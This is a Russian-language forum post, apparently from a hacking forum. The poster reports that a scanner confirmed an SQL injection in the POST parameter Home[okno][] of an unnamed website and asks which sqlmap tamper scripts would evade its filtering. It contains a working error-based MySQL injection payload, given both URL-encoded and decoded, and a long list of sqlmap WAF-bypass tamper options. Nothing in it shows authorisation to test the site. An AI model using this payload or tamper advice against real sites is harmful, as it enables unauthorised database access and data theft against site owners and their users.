Нашел сканером на одном сайте уязвимость, сканер проверил подтвердил и выдал sql-injection
.SpoilerTarget" type="button">Spoiler: POST параметр:
Код:
Home%5bokno%5d%5b%5d=-1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(110)%2cCHAR(115)%2cCHAR(124)%2cCHAR(124)%2cCHAR(49)%2cCHAR(49)%2cCHAR(49)%2cCHAR(53)%2cCHAR(56)%2cCHAR(54)%2cCHAR(49)%2cCHAR(52)%2cCHAR(54)%2cCHAR(57)%2cCHAR(124)%2cCHAR(124)%2cCHAR(110)%2cCHAR(115)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22
То есть:
Код:
Home[okno][]=-1"+and+6=3+or+1=1+(SELECT+1+and+ROW(1,1)>(SELECT+COUNT(*),CONCAT(ns||1115861469||ns,0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)+"
Какие параметры указать в tamper? Пробовал between (вплоть до space2plus.py) как правильнее будет?
P.S> Походу это я что то косячу...
Погуглил прочитал что некоторые сразу все указывают, типо:
Код:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
От этого же может и не быть результата? И как правильнее выяснить какой именно тебе использовать?